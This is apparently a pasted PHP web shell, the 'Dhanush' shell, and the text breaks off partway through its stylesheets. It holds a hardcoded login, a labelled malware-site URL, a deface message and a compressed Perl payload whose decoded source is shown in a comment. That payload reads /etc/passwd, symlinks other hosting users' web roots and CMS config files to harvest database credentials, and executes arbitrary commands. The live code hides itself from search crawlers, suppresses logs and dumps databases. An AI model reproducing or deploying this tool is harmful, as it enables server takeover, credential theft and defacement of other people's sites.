· 11 years ago · Jul 26, 2015, 02:28 PM
1<?php
2/*
3full decode by sohai
4without error and no backdoor ditected
5*/
6//========================================//
7//========+++Dhanush+++==========//
8//========================================//
9//====+++Coded By Arjun+++===//
10//========================================//
11//=====+++An Indian Hacker+++=====//
12//========================================//
13//====Magh-2070/Feb-2014====//
14
15// Set Username & Password
16$user = "asd";
17$pass = "asd";
18
19$malsite = "http://jolygoestobeinvester.ru/"; // Malware Site
20$ind = "WW91IGp1c3QgZ290IGhhY2tlZCAhISEhIQ=="; // "Deface Page" Base64 encoded "You Just Got Hacked !!"
21$bgimage = 'http://www.datadiary.com/UserFiles/Wallpaper/holy/Org201204050407061198000.jpg'; // Background Image
22$my_shell_style = "dhanush"; // "phizo", "dhanush", "404", "orange"
23
24$curfile = __FILE__;
25
26
27$plsym = "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";
28/*
29$plsym isi koddednya :
30
31#!/usr/bin/perl -I/usr/local/bandmin
32#========================================//
33#=====+++Dhanush Symlink+++======//
34#========================================//
35#====+++Coded By Arjun+++===//
36#========================================//
37#=====+++An Indian Hacker+++=====//
38#========================================//
39
40local ($buffer, @pairs, $pair, $name, $value, %FORM);
41 # Read in text
42 $ENV{'REQUEST_METHOD'} =~ tr/a-z/A-Z/;
43 if ($ENV{'REQUEST_METHOD'} eq "GET")
44 {
45 $buffer = $ENV{'QUERY_STRING'};
46 }
47 # Split information into name/value pairs
48 @pairs = split(/&/, $buffer);
49 foreach $pair (@pairs)
50 {
51 ($name, $value) = split(/=/, $pair);
52 $value =~ tr/+/ /;
53 $value =~ s/%(..)/pack("C", hex($1))/eg;
54 $FORM{$name} = $value;
55 }
56 $server = $FORM{server};
57 $perl = $FORM{perl};
58 $config = $FORM{config};
59 $execute = $FORM{execute};
60 $execmd = $FORM{execmd};
61 $exe = $FORM{exe};
62print "Content-type: text/html\n\n";
63print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
64<html xmlns="http://www.w3.org/1999/xhtml">
65<head>
66<http-equiv="Content-Language" content="en-us" />
67<http-equiv="Content-Type" content="text/html; charset=utf-8" />
68<title>Coded By Arjun</title>
69<style type="text/css">
70.newStyle1 {
71background-color: #000000;
72font-family: "Courier New", Courier, monospace;
73font-weight: bold;
74color: #FF0000;
75}
76.style1 {
77text-align: center;
78font-color: #FF0000;
79}
80.but
81{background-color: #000000;color:#FF0000; border-color:#000000;}
82.box
83{background-color:#0C0C0C;color:#FF0000;width:27%; border-color:#000000;}
84.tbox
85{background-color:#0C0C0C;color:#FF0000;border-color:#000000;}
86</style>
87</head>
88<body class="newStyle1">
89<center><font size=4><pre>
90//========================================//
91//========+++धनुष+++==========//
92//========================================//
93//====+++अर्जुन द्वरा निर्मित+++===//
94//========================================//
95//=====+++पर्ल सिमलिकं उपमार्ग+++=====//
96//========================================//
97</pre></font></font></center>
98<p class="style1"></p>
99<table align=center><tr><td><form><input type=hidden name="server" value="Server Sym"><input type="submit" value="Server सिमलिकं" class=but></form></td>
100<td><form><input type=hidden name="perl" value="Perl Sym"><input type="submit" value="Perl सिमलिकं" class=but></form></td>
101<td><form><input type=hidden name="config" value="Get config"><input type="submit" value="config दस्तावेज लें" class=but></form></td></tr></table><br><br>
102<center><form><input type=text name=execute class=box value='.$execute.'><input type=hidden name="execmd" value="Execute"> <input type=submit name=exe value="Execute" class=but></form></center>';
103
104sub getsym
105{
106 symlink('/home/'.$_[0].'/public_html/vb/includes/config.php',$_[1].'~~vBulletin1.txt');
107 symlink('/home/'.$_[0].'/public_html/core/includes/config.php',$_[1].'~~vBulletin5.txt');
108 symlink('/home/'.$_[0].'/public_html/includes/config.php',$_[1].'~~vBulletin2.txt');
109 symlink('/home/'.$_[0].'/public_html/forum/includes/config.php',$_[1].'~~vBulletin3.txt');
110 symlink('/home/'.$_[0].'/public_html/vb/core/includes/config.php',$_[1].'~~vBulletin5.txt');
111 symlink('/home/'.$_[0].'/public_html/inc/config.php',$_[1].'~~mybb.txt');
112 symlink('/home/'.$_[0].'/public_html/config.php',$_[1].'~~Phpbb1.txt');
113 symlink('/home/'.$_[0].'/public_html/forum/includes/config.php',$_[1].'~~Phpbb2.txt');
114 symlink('/home/'.$_[0].'/public_html/conf_global.php',$_[1].'~~ipb1.txt');
115 symlink('/home/'.$_[0].'/public_html/wp-config.php',$_[1].'~~Wordpress1.txt');
116 symlink('/home/'.$_[0].'/public_html/blog/wp-config.php',$_[1].'~~Wordpress2.txt');
117 symlink('/home/'.$_[0].'/public_html/configuration.php',$_[1].'~~Joomla1.txt');
118 symlink('/home/'.$_[0].'/public_html/blog/configuration.php',$_[1].'~~Joomla2.txt');
119 symlink('/home/'.$_[0].'/public_html/joomla/configuration.php',$_[1].'~~Joomla3.txt');
120 symlink('/home/'.$_[0].'/public_html/bb-config.php',$_[1].'~~boxbilling.txt');
121 symlink('/home/'.$_[0].'/public_html/billing/bb-config.php',$_[1].'~~boxbilling.txt');
122 symlink('/home/'.$_[0].'/public_html/whm/configuration.php',$_[1].'~~Whm1.txt');
123 symlink('/home/'.$_[0].'/public_html/whmc/configuration.php',$_[1].'~~Whm2.txt');
124 symlink('/home/'.$_[0].'/public_html/support/configuration.php',$_[1].'~~Whm3.txt');
125 symlink('/home/'.$_[0].'/public_html/client/configuration.php',$_[1].'~~Whm4.txt');
126 symlink('/home/'.$_[0].'/public_html/billings/configuration.php',$_[1].'~~Whm5.txt');
127 symlink('/home/'.$_[0].'/public_html/billing/configuration.php',$_[1].'~~Whm6.txt');
128 symlink('/home/'.$_[0].'/public_html/clients/configuration.php',$_[1].'~~Whm7.txt');
129 symlink('/home/'.$_[0].'/public_html/whmcs/configuration.php',$_[1].'~~Whm8.txt');
130 symlink('/home/'.$_[0].'/public_html/order/configuration.php',$_[1].'~~Whm9.txt');
131 symlink('/home/'.$_[0].'/public_html/admin/conf.php',$_[1].'~~5.txt');
132 symlink('/home/'.$_[0].'/public_html/admin/config.php',$_[1].'~~4.txt');
133 symlink('/home/'.$_[0].'/public_html/conf_global.php',$_[1].'~~invisio.txt');
134 symlink('/home/'.$_[0].'/public_html/include/db.php',$_[1].'~~7.txt');
135 symlink('/home/'.$_[0].'/public_html/connect.php',$_[1].'~~8.txt');
136 symlink('/home/'.$_[0].'/public_html/mk_conf.php',$_[1].'~~mk-portale1.txt');
137 symlink('/home/'.$_[0].'/public_html/include/config.php',$_[1].'~~12.txt');
138 symlink('/home/'.$_[0].'/public_html/settings.php',$_[1].'~~Smf.txt');
139 symlink('/home/'.$_[0].'/public_html/includes/functions.php',$_[1].'~~phpbb3.txt');
140 symlink('/home/'.$_[0].'/public_html/include/db.php',$_[1].'~~infinity.txt');
141}
142sub chdr
143{
144 chdir $_[0];
145 open(DATA, ">.htaccess");
146 print DATA "Options all\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nRequire None\nSatisfy Any";
147}
148if($server eq "Server Sym")
149{
150 mkdir "arj", 0755;
151 &chdr("arj");
152 chdir "arj";
153 open (d0mains, '/etc/named.conf') or $err=1;
154 @kr = <d0mains>;
155 close d0mains;
156 if ($err)
157 {
158 open INPUT, "</etc/passwd";
159 while ( <INPUT> )
160 {
161 $line=$_; @sprt=split(/:/,$line); $user=$sprt[0];
162 system('ln -s /home/'.$user.'/public_html ' . $user);
163 }
164 print '<center>कार्य पूरा हुआ <a href=arj>यहाँ जायें</a></center>';
165 }
166 else
167 {
168 foreach my $one (@kr)
169 {
170 if($one =~ m/.*?zone "(.*?)" {/)
171 {
172 $filename= "/etc/valiases/".$1;
173 $owner = getpwuid((stat($filename))[4]);
174 system('ln -s /home/'.$owner.'/public_html ' . $1);
175 }
176 }
177 print '<center>कार्य पूरा हुआ <a href=arj>यहाँ जायें</a></center>';
178 }
179}
180elsif($perl eq "Perl Sym")
181{
182 mkdir "arj", 0755;
183 &chdr("arj");
184 chdir "arj";
185 open (d0mains, '/etc/named.conf') or $err=1;
186 @kr = <d0mains>;
187 close d0mains;
188 if ($err)
189 {
190 open INPUT, "</etc/passwd";
191 while ( <INPUT> )
192 {
193 $line=$_; @sprt=split(/:/,$line); $user=$sprt[0];
194 symlink('/home/'.$user.'/public_html', $user);
195 }
196 print '<center>कार्य पूरा हुआ <a href=arj>यहाँ जायें</a></center>';
197 }
198 else
199 {
200 foreach my $one (@kr)
201 {
202 if($one =~ m/.*?zone "(.*?)" {/)
203 {
204 $filename= "/etc/valiases/".$1;
205 $owner = getpwuid((stat($filename))[4]);
206 symlink('/home/'.$owner.'/public_html', $1);
207 }
208 }
209 print '<center>कार्य पूरा हुआ <a href=arj>यहाँ जायें</a></center>';
210 }
211}
212elsif($config eq "Get config")
213{
214 mkdir "arj1", 0755;
215 &chdr("arj1");
216 chdir "arj1";
217 open (d0mains, '/etc/named.conf') or $err=1;
218 @kr = <d0mains>;
219 close d0mains;
220 if ($err)
221 {
222 open INPUT, "</etc/passwd";
223 while ( <INPUT> )
224 {
225 $line=$_; @sprt=split(/:/,$line); $user=$sprt[0];
226 $user1 = $user;
227 &getsym($user,$user1);
228 }
229 print '<center>कार्य पूरा हुआ <a href=arj1>यहाँ जायें</a></center>';
230 }
231 else
232 {
233 foreach my $one (@kr)
234 {
235 if($one =~ m/.*?zone "(.*?)" {/)
236 {
237 $filename= "/etc/valiases/".$1;
238 $owner = getpwuid((stat($filename))[4]);
239 &getsym($owner,$1);
240 }
241 }
242 print '<center>कार्य पूरा हुआ <a href=arj1>यहाँ जायें</a></center>';
243 }
244}
245elsif($execmd eq "Execute")
246{
247 print '<br><br><center><textarea cols="95" rows="19" class=tbox>'.readpipe($execute).'</textarea></center>';
248}
249print '<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582Ltpw5OIinlRRxDk0REVAuynH%2bc7TbUoLM20JZVtOfoPsx9wVbwJt7K4tuwFL5IWtpF0BEwN32Sf9uQLBszf8YjUMgAiM91LcRJ7YoyzN1u77LT0o%2bOgq9JYt8gGfGPgnkeJpxKAtZLbCwO62vG6od6c2439CXP3e6%2ftbYplZSXaRZozlDG%2fVvgWKGBbfE5Dg0jMSTJokUotJdMSD4NBUsVLe%2fjrQPXQh4Rlm01%2baL%2foXe7GF9MpQQAgIig17aR11Mgys3iNkN46LUXligt3YkNjD7zK4OtVZf8Nlvx8mto19UqA9VKfLrXtJT3%2bZjn2WHzybsGZF7uabEqUpsJATCS9SMN0VMazre70TO2X468UHU%2bbYtQ337lRj%2b0fdYCF%2fOUA2SdmSa%2f7khFbX%2ffYyWEmwmY6cN8tzsK4QeCxX7YjlCHy7KLk5A2ulaGzHgqYzuklwPYLtvBgUHzspz8JA%2fsum84wz7L7f5hN1zFuFLKFQ8VMeQBI6ppVeeKf3dgGA21x4nXguisvbcmLp45Y8Ws%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body></html>';
250
251*/
252
253
254
255
256@set_magic_quotes_runtime(0);
257@ini_set('error_log',NULL);
258@ini_set('log_errors',0);
259ob_start();
260error_reporting(0);
261@set_time_limit(0);
262@ini_set('max_execution_time',0);
263@ini_set('output_buffering',0);
264
265if(!empty($_SERVER['HTTP_USER_AGENT']))
266{
267 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
268 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
269 header('HTTP/1.0 404 Not Found');
270 exit; }
271}
272// Dump Database
273if($_GET["action"] == "dumpDB")
274{
275 $self=$_SERVER["PHP_SELF"];
276 if(isset($_COOKIE['dbserver']))
277 {
278 $date = date("Y-m-d");
279 $dbserver = $_COOKIE["dbserver"];
280 $dbuser = $_COOKIE["dbuser"];
281 $dbpass = $_COOKIE["dbpass"];
282 $dbname = $_GET['dbname'];
283 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
284
285 $file = "Dump-$dbname-$date";
286
287 $file="Dump-$dbname-$date.sql";
288 $fp = fopen($file,"w");
289
290 function write($data)
291 {
292 global $fp;
293
294 fwrite($fp,$data);
295
296 }
297 mysql_connect ($dbserver, $dbuser, $dbpass);
298 mysql_select_db($dbname);
299 $tables = mysql_query ("SHOW TABLES");
300 while ($i = mysql_fetch_array($tables))
301 {
302 $i = $i['Tables_in_'.$dbname];
303 $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
304 write($create['Create Table'].";");
305 $sql = mysql_query ("SELECT * FROM ".$i);
306 if (mysql_num_rows($sql)) {
307 while ($row = mysql_fetch_row($sql)) {
308 foreach ($row as $j => $k) {
309 $row[$j] = "'".mysql_escape_string($k)."'";
310 }
311 write("INSERT INTO $i VALUES(".implode(",", $row).");");
312 }
313 }
314 }
315
316 fclose ($fp);
317
318 header("Content-Disposition: attachment; filename=" . $file);
319 header("Content-Type: application/download");
320 header("Content-Length: " . filesize($file));
321 flush();
322
323 $fp = fopen($file, "r");
324 while (!feof($fp))
325 {
326 echo fread($fp, 65536);
327 flush();
328 }
329 fclose($fp);
330 }
331}
332$hs_dhanush = "<style type=\"text/css\">
333<!--
334
335body,td,th {
336 color: #FF0000;
337 font-size: 14px;
338}
339tr:hover.lines
340{
341background-color:#000000;}
342tr.lines
343{
344background-color:#0C0C0C;}
345div.fixedbox
346{
347 width:70%;
348 padding:8px;
349 background-color:#171717;
350 position:fixed;
351 left:15%;
352 top:120px;
353 box-shadow: 0px 0px 10px #000;
354 -moz-border-radius: 5px 5px 5px 5px;
355 -webkit-border-radius: 5px 5px 5px 5px;
356 border-radius: 5px 5px 5px 5px;
357}
358div.logindiv{
359background-color:#171717; }
360table.btmtbl{
361border-collapse:collapse;
362border-color:red;}
363td.btmtbl{
364border-color:red;}
365input.but {
366 background-color:#000000;
367 color:#FF0000;
368 border : 1px solid #1B1B1B;
369}
370a:link {
371 color: #00FF00;
372 text-decoration:none;
373 font-weight:500;
374}
375a:hover {
376 color:#00FF00;
377 text-decoration:underline;
378}
379font.txt
380{
381 color: #00FF00;
382 text-decoration:none;
383 font-size:14px;
384}
385font.om
386{
387 color: #00FF00;
388}
389/* Write Permission Font */
390font.wrtperm
391{
392 color:#00FF00;
393}
394/* Read Permission Font */
395font.readperm
396{
397 color:#FF0000;
398}
399/* No Permission Font */
400font.noperm
401{
402 color:#FFFFFF;
403}
404font.mainmenu
405{
406 color:#FF0000;
407 text-decoration:none;
408 font-size:14px;
409}
410a:visited {
411 color: #FF0000;
412}
413input.box
414{
415 background-color:#0C0C0C;
416 color: lime;
417 border : 1px solid #1B1B1B;
418 -moz-border-radius:6px;
419 width:400;
420 border-radius:6px;
421}
422input.sbox
423{
424 background-color:#0C0C0C;
425 color: lime;
426 border : 1px solid #1B1B1B;
427 -moz-border-radius:6px;
428 width:180;
429 border-radius:6px;
430}
431select.sbox
432{
433 background-color:#0C0C0C;
434 color: lime;
435 border : 1px solid #1B1B1B;
436 -moz-border-radius:6px;
437 width:180;
438 border-radius:6px;
439}
440select.box
441{
442 background-color:#0C0C0C;
443 color: lime;
444 border : 1px solid #1B1B1B;
445 -moz-border-radius:6px;
446 width:400;
447 border-radius:6px;
448}
449
450textarea.box
451{
452 border : 3px solid #111;
453 background-color:#161616;
454 color : lime;
455 margin-top: 10px;
456 -moz-border-radius:7px;
457 border-radius:7px;
458}
459body {
460 background-color:#000000;
461}
462.myphp table
463{
464 width:100%;
465 padding:18px 10px;
466 border : 1px solid #1B1B1B;
467}
468.myphp td
469{
470 background:#111111;
471 color:#00ff00;
472 padding:6px 8px;
473 border-bottom:1px solid #222222;
474 font-size:14px;
475}
476.myphp th, th
477{
478 background:#181818;
479
480}
481-->
482</style>";
483$hs_orange = "<style type=\"text/css\">
484<!--
485body {
486background-image:url($bgimage);
487background-color:#000000;
488background-repeat:no-repeat;
489background-attachment:fixed;
490}
491/* Shell Title Color*/
492span.headtitle
493{
494 color:#F90;
495 text-decoration:none;
496
497}
498/* Login Page div*/
499div.logindiv
500{
501background-color:#000000;
502opacity:0.5;
503width:50%;
504border-radius:7px;
505margin-top:150px;
506-moz-border-radius:25px;
507height:410px;
508border: solid 1px
509#878787;
510border-radius: 13px;
511box-shadow: 0px 0px 10px
512black;
513}
514div.fixedbox
515{
516 width:70%;
517 padding:8px;
518 background-color:#171717;
519 position:fixed;
520 left:15%;
521 top:120px;
522 box-shadow: 0px 0px 35px #000;
523 -moz-border-radius: 5px 5px 5px 5px;
524 -webkit-border-radius: 5px 5px 5px 5px;
525 border-radius: 5px 5px 5px 5px;
526}
527table.tbl
528{
529border:#F90;
530}
531body,td,th {
532 color: #F90;
533 font-size: 14px;
534}
535table.btmtbl{
536border-collapse:collapse;
537border-color:#F90;}
538td.btmtbl{
539border-color:#F90;}
540/* Present Working Directory Table */
541table.pwdtbl
542{
543 border-color:#F90;
544}
545/* File List Hover */
546tr.lines:hover
547{
548background-color:#666666;
549opacity:0.5;
550}
551/* File List */
552tr.lines
553{
554 height:12px;
555}
556/* Functions Config */
557td.myfun
558{
559 display: inline;
560 padding: 1px;
561 margin: 5px;
562 border: 1px solid #AAA;
563 border-radius: 4px;
564 -moz-border-radius:4px;
565 box-shadow: 0px 0px 2px #000;
566}
567/* Functions Config Hover */
568td.myfun:hover
569{
570 box-shadow: 0px 0px 2px #FF0;
571}
572/* Button Config */
573input.but {
574 border: 1px solid #F90;
575 background-color:#000000;
576 color:#FFFFFF;
577
578 box-shadow: 0px 0px 2px #F90 inset;
579}
580/* Link Config */
581a:link {
582 color: #F90;
583 text-decoration:none;
584 font-weight:500;
585}
586/* Link Config Hover */
587a:hover {
588 color:#666666;
589 text-decoration:underline;
590}
591/* Link Config Visited */
592a:visited {
593 color: #F90;
594 text-decoration:none;
595}
596/* font Config */
597font.txt
598{
599 color: #FFFFFF;
600 text-decoration:none;
601 font-size:13px;
602}
603font.om
604{
605 color: #F90;
606}
607/* Function Font Config */
608font.fun
609{
610 color:#F90;
611}
612/* Write Permission Font */
613font.wrtperm
614{
615 color:#F90;
616}
617/* Read Permission Font */
618font.readperm
619{
620 color:#FF0000;
621}
622/* No Permission Font */
623font.noperm
624{
625 color:#FFFFFF;
626}
627/* Upload File Config */
628input.upld
629{
630 width:400;
631 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
632}
633/* Input TextBox Config */
634input.box
635{
636 width:400;
637 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
638}
639/* Input Small TextBox Config */
640input.sbox
641{
642 width:180;
643 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
644}
645/* Input Small SelectBox Config */
646select.sbox
647{
648 width:180;
649 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
650}
651/* Input SelectBox Config */
652select.box
653{
654 width:400;
655 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
656}
657/* TextArea Config */
658textarea.box
659{
660 border: 1px solid #F90;
661 color:#FFFFFF;
662 margin-top: 10px;
663 box-shadow: 0px 0px 3px #F90 inset;
664 background-color: #000000;
665 opacity: 0.50;
666}
667.myphp table
668{
669 width:100%;
670 padding:18px 10px;
671 border: 1px solid #F90;
672}
673.myphp td
674{
675 padding:6px 8px;
676 border-bottom:1px solid #222222;
677 font-size:14x;
678}
679
680-->
681</style>";
682$hs_404 = "<style type=\"text/css\">
683<!--
684span.headtitle
685{
686 color:#00ff00;
687 text-decoration:none;
688
689}
690body, th{
691 color:#00ff00;
692 background-color:#000000;
693 font-size: 13px;
694}
695div.logindiv{
696background-color:#171717; }
697div.fixedbox
698{
699 width:70%;
700 padding:8px;
701 background-color:#171717;
702 position:fixed;
703 left:15%;
704 top:120px;
705 box-shadow: 0px 0px 35px #000;
706 -moz-border-radius: 5px 5px 5px 5px;
707 -webkit-border-radius: 5px 5px 5px 5px;
708 border-radius: 5px 5px 5px 5px;
709}
710table.tbl
711{
712border:#00ff00;
713}
714table.btmtbl{
715border-collapse:collapse;
716border-color:lime;}
717td.btmtbl{
718border-color:lime;}
719tr.lines:hover
720{
721 background-color:#5e5e5e;
722}
723tr.lines
724{
725 background-color:#000000;
726 height:12px;
727 font-size: 14px;
728}
729td.myfun
730{
731 border-style:none;
732 margin: 5px;
733}
734td.myfun:hover
735{
736 box-shadow: 0px 0px 2px #FF0;
737}
738input.but {
739 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
740}
741a:link {
742 color: #00ff00;
743 text-decoration:none;
744 font-weight:500;
745}
746a:visited
747{
748color:#00ff00;
749}
750a:hover {
751 background:#ff0000;
752}
753font.mainmenu
754{
755 font-size:14px;
756}
757font.txt
758{
759 color: #FFFFFF;
760 text-decoration:none;
761 font-size:13px;
762}
763font.om
764{
765 color:#00FF00;
766}
767font.fun
768{
769
770 color:#00ff00;
771}
772font.wrtperm
773{
774 color:#00ff00;
775}
776font.readperm
777{
778 color:#FF0000;
779}
780font.noperm
781{
782 color:#FFFFFF;
783}
784input.upld
785{
786 width:400;
787 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
788}
789input.box
790{
791 width:400;
792 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
793}
794input.sbox
795{
796 width:180;
797 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
798}
799select.sbox
800{
801 width:180;
802 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
803}
804select.box
805{
806 width:400;
807 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
808}
809
810textarea.box
811{
812 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
813}
814.myphp table
815{
816 width:100%;
817 padding:18px 10px;
818 border : 1px solid #00FF00;
819}
820.myphp td
821{
822 background:#111111;
823 color:#00ff00;
824 padding:6px 8px;
825 border-bottom:1px solid #222222;
826 font-size:13px;
827}
828.myphp th,
829{
830 background:#181818;
831
832}
833-->
834</style>";
835$hs_phizo = "<style type=\"text/css\">
836<!--
837span.headtitle
838{
839 color:#000000;
840 text-decoration:none;
841
842}
843div.logindiv
844{
845background-color:#CCC;
846width:50%;
847border-radius:7px;
848margin-top:150px;
849-moz-border-radius:25px;
850height:410px;
851border: solid 1px
852#878787;
853border-radius: 13px;
854box-shadow: 0px 0px 10px
855black;
856}
857div.fixedbox
858{
859 width:70%;
860 padding:8px;
861 background-color:#999999;
862 position:fixed;
863 left:15%;
864 top:120px;
865 box-shadow: 0px 0px 10px #000;
866 -moz-border-radius: 5px 5px 5px 5px;
867 -webkit-border-radius: 5px 5px 5px 5px;
868 border-radius: 5px 5px 5px 5px;
869}
870body,td,th {
871 color: #000000;
872 font-size: 14px;
873}
874table.pwdtbl
875{
876 width:95%;
877 background-color:#999999;
878 -moz-border-radius:25px;
879 border-radius:25px;
880}
881table#maintable
882{
883 background-color: #999999;
884 border: solid 1px #878787;
885 border-radius: 13px;
886 box-shadow: 0px 0px 10px #000;
887 width: 100%;
888 margin: auto;
889 height: auto;
890}
891tr.lines:hover
892{
893background-color:#C0C0C0;
894}
895tr.lines
896{
897 background-color:#999999;
898 height:12px;
899}
900td.myfun
901{
902 display: inline;
903 padding: 1px;
904 margin: 5px;
905 border: 1px solid #AAA;
906 border-radius: 4px;
